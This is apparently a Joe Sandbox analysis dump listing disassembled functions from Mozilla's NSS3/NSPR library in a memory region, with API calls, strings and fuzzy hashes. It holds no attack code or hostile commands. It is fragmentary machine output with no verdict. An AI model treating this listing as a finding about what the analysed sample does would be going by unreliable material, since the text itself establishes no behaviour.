PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C736FA1

Strings

ulPartLen = %d, xrefs: 6C736F9C
hSession = 0x%x, xrefs: 6C736F2E, 6C736F3E
(CK_INVALID_HANDLE), xrefs: 6C736F4C
C_DigestUpdate, xrefs: 6C736F11
pPart = 0x%p, xrefs: 6C736F83

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate
API String ID: 1003633598-226530419
Opcode ID: 0842bc65122bc2bb400bbf2634a72057084a9ce09d3b55663d8b81c47889a384
Instruction ID: 4225626bf81f68d96ace66284604a183416253cf51eae5db399b28e855aabcf7
Opcode Fuzzy Hash: 0842bc65122bc2bb400bbf2634a72057084a9ce09d3b55663d8b81c47889a384
Instruction Fuzzy Hash: AE31F234606025ABDB20DB25CE4CF6A37B5AB4235CF046434E80C9BB03DB38E948CBD6

Function 6C704880 Relevance: 18.2, APIs: 12, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7048A2
PORT_NewArena_Util.NSS3(00000800), ref: 6C7048C4
PORT_ArenaAlloc_Util.NSS3(?,000000BC), ref: 6C7048D8
memset.VCRUNTIME140(00000004,00000000,000000B8), ref: 6C7048FB
PORT_ArenaAlloc_Util.NSS3(?,00000018), ref: 6C704908
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C704947
SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C70496C
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C704988
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C828DAC,?), ref: 6C7049DE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7049FD
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C704ACB

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$Alloc_ArenaError$Arena_Item_$CopyDecodeFreeQuickmemset
String ID:
API String ID: 4201528089-0
Opcode ID: aafb5abe934e316b279e847d731f87b28192e975e375a8b5f6fc535f5ffbda3e
Instruction ID: 47a1e76b670122b456c322d0257c0ef3082767c2831215b5bfa9ae6fff0a132f
Opcode Fuzzy Hash: aafb5abe934e316b279e847d731f87b28192e975e375a8b5f6fc535f5ffbda3e
Instruction Fuzzy Hash: C45103F1B003019FEB108E65DE4A79B77E4BF60308F144538E919ABB81EB71D858DB66

Function 6C7D2D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C7D2D9F

Part of subcall function 6C68CA30: EnterCriticalSection.KERNEL32(?,?,?,6C6EF9C9,?,6C6EF4DA,6C6EF9C9,?,?,6C6B369A), ref: 6C68CA7A
Part of subcall function 6C68CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C68CB26

sqlite3_exec.NSS3(?,?,6C7D2F70,?,?), ref: 6C7D2DF9
sqlite3_free.NSS3(00000000), ref: 6C7D2E2C
sqlite3_free.NSS3(?), ref: 6C7D2E3A
sqlite3_free.NSS3(?), ref: 6C7D2E52
sqlite3_mprintf.NSS3(6C83AAF9,?), ref: 6C7D2E62
sqlite3_free.NSS3(?), ref: 6C7D2E70
sqlite3_free.NSS3(?), ref: 6C7D2E89
sqlite3_free.NSS3(?), ref: 6C7D2EBB
sqlite3_free.NSS3(?), ref: 6C7D2ECB
sqlite3_free.NSS3(00000000), ref: 6C7D2F3E
sqlite3_free.NSS3(?), ref: 6C7D2F4C

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: 2dfd81bb95f7861e55db35b379a145f56cb94c05a622332f37e9d55091a12fdc
Instruction ID: 17cfcd32db8ea84a50e7038dbec8f6f4cf6280e68920235998e521a72009eaba
Opcode Fuzzy Hash: 2dfd81bb95f7861e55db35b379a145f56cb94c05a622332f37e9d55091a12fdc
Instruction Fuzzy Hash: DD619FB5E052069BEB00CF68D989B9EBBB5AF49348F160034DC45A7701E735FC46CBA5

Function 6C717C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C862120,Function_00097E60,00000000,?,?,?,?,6C79067D,6C791C60,00000000), ref: 6C717C81

Part of subcall function 6C684C70: TlsGetValue.KERNEL32(?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684C97
Part of subcall function 6C684C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684CB0
Part of subcall function 6C684C70: PR_Unlock.NSS3(?,?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684CC9

TlsGetValue.KERNEL32 ref: 6C717CA0
EnterCriticalSection.KERNEL32(?), ref: 6C717CB4
PR_Unlock.NSS3 ref: 6C717CCF

Part of subcall function 6C7ADD70: TlsGetValue.KERNEL32 ref: 6C7ADD8C
Part of subcall function 6C7ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7ADDB4

TlsGetValue.KERNEL32 ref: 6C717D04
EnterCriticalSection.KERNEL32(?), ref: 6C717D1B
realloc.MOZGLUE(-00000050), ref: 6C717D82
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C717DF4
PR_Unlock.NSS3 ref: 6C717E0E

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
String ID:
API String ID: 2305085145-0
Opcode ID: 042737fcf677e2598f9ef8874a53c34aed998e4977a4669e71269a1cdda90708
Instruction ID: 055f874cf1c0d6ccdcfe7bb19a4c43ff672a5e565d3dbb87a97d661c097965ec
Opcode Fuzzy Hash: 042737fcf677e2598f9ef8874a53c34aed998e4977a4669e71269a1cdda90708
Instruction Fuzzy Hash: F4512371A0C1049FDB215F29CE4AA7537B5FB0231CF1941BAED4487B62EB30E865CAC1

Function 6C684C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684C97
EnterCriticalSection.KERNEL32(?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684CB0
PR_Unlock.NSS3(?,?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684D97
PR_Lock.NSS3(?,?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684DBA
PR_WaitCondVar.NSS3 ref: 6C684DD4
PR_Unlock.NSS3(?,?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684DEF

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 224b6976bdba805b25e2ec61be61419c950873ee0cc85a5549816226993b9e6f
Instruction ID: 871c29196e622a4c04161c6f1f5387901abddff3fda0d4b41ca3c12f0a23cbad
Opcode Fuzzy Hash: 224b6976bdba805b25e2ec61be61419c950873ee0cc85a5549816226993b9e6f
Instruction Fuzzy Hash: 9A41C0B5A09611CFCB10AF79C0981697BF8BF0A318F055679DC889B711EB70D881CBDA

Function 6C70E910 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 149memorystringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(?,http://,00000007), ref: 6C70E93B
PR_SetError.NSS3(FFFFE075,00000000), ref: 6C70E94E
PORT_Alloc_Util.NSS3(00000001), ref: 6C70E995
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C70E9A7
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 6C70E9CA
PORT_Strdup_Util.NSS3(6C84933E), ref: 6C70EA17
PORT_Alloc_Util.NSS3(00000001), ref: 6C70EA28

Part of subcall function 6C760BE0: malloc.MOZGLUE(6C758D2D,?,00000000,?), ref: 6C760BF8
Part of subcall function 6C760BE0: TlsGetValue.KERNEL32(6C758D2D,?,00000000,?), ref: 6C760C15

memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C70EA3C
free.MOZGLUE(?), ref: 6C70EA69

Strings

http://, xrefs: 6C70E935

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$Alloc_memcpy$ErrorL_strncasecmpStrdup_Valuefreemallocstrtol
String ID: http://
API String ID: 3982757857-1121587658
Opcode ID: afee2beaaf895b2eb9f328fd8063fbbe3865086d1eec834bb673ce339b0b2302
Instruction ID: 9d9ff5808b1794b55c4e1433705b271e3c18721bc4209a9eb648d8bed667f029
Opcode Fuzzy Hash: afee2beaaf895b2eb9f328fd8063fbbe3865086d1eec834bb673ce339b0b2302
Instruction Fuzzy Hash: D54169F4B5890E4BEB604AA88F417EA7FE5AB0B31CF140036D8D497F42E2118546C3E7

Function 6C817CD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113threadstringCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C817CE0

Part of subcall function 6C7C9BF0: TlsGetValue.KERNEL32(?,?,?,6C810A75), ref: 6C7C9C07

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C817D36
PR_Realloc.NSS3(?,00000080), ref: 6C817D6D
PR_GetCurrentThread.NSS3 ref: 6C817D8B
PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6C817DC2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C817DD8
malloc.MOZGLUE(00000080), ref: 6C817DF8
PR_GetCurrentThread.NSS3 ref: 6C817E06

Strings

NSPR_INHERIT_FDS=%s:%d:0x%lx, xrefs: 6C817DF0
:%s:%d:0x%lx, xrefs: 6C817DB9

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
API String ID: 530461531-3274975309
Opcode ID: 6452ceb26844328edfbd0e0c0a5d19ec5c6c7f6d64be91328a5e74eb14ef8838
Instruction ID: 52a30f3625c822e467a1f4727a9bc33763aa8794a39dc418ba80890e7ebe65da
Opcode Fuzzy Hash: 6452ceb26844328edfbd0e0c0a5d19ec5c6c7f6d64be91328a5e74eb14ef8838
Instruction Fuzzy Hash: D341D6B161420A9FDB14CF28CE84D6B37E6FF85318B25496CE8198BF51D731E801CBA1

Function 6C724E50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C724E90
EnterCriticalSection.KERNEL32 ref: 6C724EA9
TlsGetValue.KERNEL32 ref: 6C724EC6
EnterCriticalSection.KERNEL32 ref: 6C724EDF
PL_HashTableLookup.NSS3 ref: 6C724EF8
PR_Unlock.NSS3 ref: 6C724F05
PR_Now.NSS3 ref: 6C724F13
PR_Unlock.NSS3 ref: 6C724F3A

Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07AD
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07CD
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07D6
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C68204A), ref: 6C6F07E4
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,6C68204A), ref: 6C6F0864
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6F0880
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,6C68204A), ref: 6C6F08CB
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08D7
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08FB

Strings

bUrl, xrefs: 6C724E5C
bUrl, xrefs: 6C724F3F

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID: bUrl$bUrl
API String ID: 326028414-462365213
Opcode ID: ee6a911a6e3d8d823119712561e11c1e41660212d66f4c30c1cc7034a5801577
Instruction ID: 8f99d4792ed39a23dc0c318ef29647433782ebdda077b6c8892a977cf55d1246
Opcode Fuzzy Hash: ee6a911a6e3d8d823119712561e11c1e41660212d66f4c30c1cc7034a5801577
Instruction Fuzzy Hash: DA4168B4A00605DFCB10EF68C5848AABBF4FF49318B058669EC599B711EB34E885CFD1

Function 6C74ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C74DE64), ref: 6C74ED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C74ED22

Part of subcall function 6C75B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8318D0,?), ref: 6C75B095

PL_FreeArenaPool.NSS3(?), ref: 6C74ED4A
PL_FinishArenaPool.NSS3(?), ref: 6C74ED6B
PR_CallOnce.NSS3(6C862AA4,6C7612D0), ref: 6C74ED38

Part of subcall function 6C684C70: TlsGetValue.KERNEL32(?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684C97
Part of subcall function 6C684C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684CB0
Part of subcall function 6C684C70: PR_Unlock.NSS3(?,?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684CC9

SECOID_FindOID_Util.NSS3(?), ref: 6C74ED52
PR_CallOnce.NSS3(6C862AA4,6C7612D0), ref: 6C74ED83
PL_FreeArenaPool.NSS3(?), ref: 6C74ED95
PL_FinishArenaPool.NSS3(?), ref: 6C74ED9D

Part of subcall function 6C7664F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C76127C,00000000,00000000,00000000), ref: 6C76650E

Strings

security, xrefs: 6C74ED06

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: 7da1b89c4d4878e0c870b65e7a79600608f0e622d2de5da66ff0e3fa050bdd6c
Instruction ID: 064460ce8181ff51a4ab2d13fb3278918617d9c8da9fc2e85191e073d905ea36
Opcode Fuzzy Hash: 7da1b89c4d4878e0c870b65e7a79600608f0e622d2de5da66ff0e3fa050bdd6c
Instruction Fuzzy Hash: C61180729002186BD7209666AF4DBBBB278AF4171DF444934EC1462F40FB74A70CCAE7

Function 6C732CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6C732CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C732D07

Part of subcall function 6C8109D0: PR_Now.NSS3 ref: 6C810A22
Part of subcall function 6C8109D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C810A35
Part of subcall function 6C8109D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C810A66
Part of subcall function 6C8109D0: PR_GetCurrentThread.NSS3 ref: 6C810A70
Part of subcall function 6C8109D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C810A9D
Part of subcall function 6C8109D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C810AC8
Part of subcall function 6C8109D0: PR_vsmprintf.NSS3(?,?), ref: 6C810AE8
Part of subcall function 6C8109D0: EnterCriticalSection.KERNEL32(?), ref: 6C810B19
Part of subcall function 6C8109D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C810B48
Part of subcall function 6C8109D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C810C76
Part of subcall function 6C8109D0: PR_LogFlush.NSS3 ref: 6C810C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C732D22

Part of subcall function 6C8109D0: OutputDebugStringA.KERNEL32(?), ref: 6C810B88
Part of subcall function 6C8109D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C810C5D
Part of subcall function 6C8109D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C810C8D
Part of subcall function 6C8109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C810C9C
Part of subcall function 6C8109D0: OutputDebugStringA.KERNEL32(?), ref: 6C810CD1
Part of subcall function 6C8109D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C810CEC
Part of subcall function 6C8109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C810CFB
Part of subcall function 6C8109D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C810D16
Part of subcall function 6C8109D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C810D26
Part of subcall function 6C8109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C810D35
Part of subcall function 6C8109D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C810D65
Part of subcall function 6C8109D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C810D70
Part of subcall function 6C8109D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C810D90
Part of subcall function 6C8109D0: free.MOZGLUE(00000000), ref: 6C810D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C732D3B

Part of subcall function 6C8109D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C810BAB
Part of subcall function 6C8109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C810BBA
Part of subcall function 6C8109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C810D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C732D54

Part of subcall function 6C8109D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C810BCB
Part of subcall function 6C8109D0: EnterCriticalSection.KERNEL32(?), ref: 6C810BDE
Part of subcall function 6C8109D0: OutputDebugStringA.KERNEL32(?), ref: 6C810C16

Strings

slotID = 0x%x, xrefs: 6C732D02
pPin = 0x%p, xrefs: 6C732D1D
ulPinLen = %d, xrefs: 6C732D36
pLabel = 0x%p, xrefs: 6C732D4F
C_InitToken, xrefs: 6C732CE7

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
API String ID: 420000887-1567254798
Opcode ID: 47578aa3061a74ee25ef9b56228af4af52c3e68ef68d27c3d5f106f93df604b5
Instruction ID: 6856a56f25967eaefc981f22ed909b3956ff5750b841cd79700bf2c10bd0b7bb
Opcode Fuzzy Hash: 47578aa3061a74ee25ef9b56228af4af52c3e68ef68d27c3d5f106f93df604b5
Instruction Fuzzy Hash: 2621F175205054AFDB219B55DF4DA693BB5EB8231DF046470F5089BB23CB38A858CBE1

Function 6C810EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6C6F2357), ref: 6C810EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C6F2357), ref: 6C810EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C810EE6

Part of subcall function 6C8109D0: PR_Now.NSS3 ref: 6C810A22
Part of subcall function 6C8109D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C810A35
Part of subcall function 6C8109D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C810A66
Part of subcall function 6C8109D0: PR_GetCurrentThread.NSS3 ref: 6C810A70
Part of subcall function 6C8109D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C810A9D
Part of subcall function 6C8109D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C810AC8
Part of subcall function 6C8109D0: PR_vsmprintf.NSS3(?,?), ref: 6C810AE8
Part of subcall function 6C8109D0: EnterCriticalSection.KERNEL32(?), ref: 6C810B19
Part of subcall function 6C8109D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C810B48
